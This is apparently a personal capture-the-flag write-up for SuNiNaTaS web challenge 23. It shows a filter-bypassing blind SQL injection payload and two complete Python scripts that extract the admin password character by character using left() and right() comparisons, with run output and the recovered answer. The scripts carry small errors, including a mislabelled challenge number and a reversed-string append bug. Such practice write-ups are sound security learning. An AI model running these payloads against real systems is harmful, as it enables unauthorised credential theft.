Suninatas Game 23

Posted on 2026-02-09 Edited on 2026-03-02 In ctf Views: Disqus: Word count in article: 624 Reading time ≈ 2 mins.

challenges

Game 23

<!-- Hint 1 : guest / guest & Your goal is to find the admin's pw -->
<!-- Hint 2 : Bypass 'admin' string -->
<!-- M@de by 2theT0P -->

Hard Blind Sql Injection
Filtering Keywords
admin/ select / Union / by / having / substring
from / char / delay / 0x / hex / asc / desc ..........

GET http://suninatas.com/challenge/web23/web23.asp?id=admin&pw=admin HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Referer: http://suninatas.com/challenge/web23/web23.asp
Cookie: ASPSESSIONIDCCRRBDTT=GGEJLNGDLBDFBJJEENBHDHDL
Upgrade-Insecure-Requests: 1
Priority: u=0, i```

# test
id: ad'+'min'and 1=1 --
pw: arst
# get OK admin

# get <td colspan="2" align="center" bgcolor="cccccc">No hack</td>

#!/usr/bin/env python3
"""
Blind SQL Injection Script
Automates character-by-character extraction via substring-based comparisons.
Target: suninatas.com Challenge 22
"""

import requests
import string
import sys

# --- Configuration ---
TARGET_URL = "http://suninatas.com/challenge/web23/web23.asp"
COOKIES = { "ASPSESSIONIDAASRCCSR": "OAJDDHCCMDNKFDFPBKCECLBN" }

CHARSET = string.ascii_letters + string.digits + "!@#$%^&*()_+"
MAX_LENGTH = 31
SUCCESS_INDICATOR = "OK  <font size=4 color=blue>admin"
ERROR_INDICATOR = "No hack"

def check_str(count, string):
    params = {
        'id': f"'or left(pw,{count})='{string}'--",
        'pw': 'ar',
    }
    # print(params)

    try:
        # Note: Using params in requests.get handles URL encoding automatically
        response = requests.get(TARGET_URL, params=params, cookies=COOKIES, timeout=5)
        if ERROR_INDICATOR in response.text:
            print(f"
[!] Error: {response.text}")
            exit()
        return SUCCESS_INDICATOR in response.text
    except requests.RequestException as e:
        print(f"
[!] Request error: {e}")
        return False

def main():
    print(f"[*] Starting Blind SQL Injection on {TARGET_URL}")
    print(f"[*] Target max length: {MAX_LENGTH}")

    extracted_string = ""

    for i in range(1, MAX_LENGTH + 1):
        found = False
        # Visual progress for the current index
        sys.stdout.write(f"[*] Finding char {i:02}: ")
        sys.stdout.flush()

        for char in CHARSET:
            if check_str(i, extracted_string + char):
                extracted_string += char
                sys.stdout.write(f"{char}
")
                sys.stdout.flush()
                found = True
                break

        if not found:
            sys.stdout.write("None found. Stopping.
")
            break

    print("
" + "="*30)
    print(f"EXTRACTED DATA: {extracted_string}")
    print("="*30)

if __name__ == "__main__":
    main()

❯ python sqli_blind.py
[*] Starting Blind SQL Injection on http://suninatas.com/challenge/web23/web23.asp
[*] Target max length: 31
[*] Finding char 01: v
[*] Finding char 02: 3
[*] Finding char 03: r
[*] Finding char 04: y
[*] Finding char 05: h
[*] Finding char 06: a
[*] Finding char 07: r
[*] Finding char 08: d
[*] Finding char 09: s
[*] Finding char 10: q
[*] Finding char 11:
[!] Error:

# get v3ryhardsq

need the right side version

#!/usr/bin/env python3
"""
Blind SQL Injection Script
Automates character-by-character extraction via substring-based comparisons.
Target: suninatas.com Challenge 22
"""

import requests
import string
import sys

# --- Configuration ---
TARGET_URL = "http://suninatas.com/challenge/web23/web23.asp"
COOKIES = { "ASPSESSIONIDAASRCCSR": "OAJDDHCCMDNKFDFPBKCECLBN" }

CHARSET = string.ascii_letters + string.digits + "!@#$%^&*()_+"
MAX_LENGTH = 31
SUCCESS_INDICATOR = "OK  <font size=4 color=blue>admin"
ERROR_INDICATOR = "No hack"

def check_str(count, string):
    params = {
        'id': f"'or right(pw,{count})='{string}'--",
        'pw': 'ar',
    }
    # print(params)

    try:
        # Note: Using params in requests.get handles URL encoding automatically
        response = requests.get(TARGET_URL, params=params, cookies=COOKIES, timeout=5)
        if ERROR_INDICATOR in response.text:
            print(f"
[!] Error: {response.text}")
            exit()
        return SUCCESS_INDICATOR in response.text
    except requests.RequestException as e:
        print(f"
[!] Request error: {e}")
        return False

def main():
    print(f"[*] Starting Blind SQL Injection on {TARGET_URL}")
    print(f"[*] Target max length: {MAX_LENGTH}")

    extracted_string = ""

    for i in range(1, MAX_LENGTH + 1):
        found = False
        # Visual progress for the current index
        sys.stdout.write(f"[*] Finding char {i:02}: ")
        sys.stdout.flush()

        for char in CHARSET:
            # need reverse??
##############################################################################
            if check_str(i, char + extracted_string):
                extracted_string += char
                sys.stdout.write(f"{char}
")
                sys.stdout.flush()
                found = True
                break

        if not found:
            sys.stdout.write("None found. Stopping.
")
            break

    print("
" + "="*30)
    print(f"EXTRACTED DATA: {extracted_string}")
    print("="*30)

if __name__ == "__main__":
    main()

❯ python sqli_blind_1.py
[*] Starting Blind SQL Injection on http://suninatas.com/challenge/web23/web23.asp
[*] Target max length: 31
[*] Finding char 01: i
[*] Finding char 02: l
[*] Finding char 03:
error ??? i dont know

v3ryhardsqli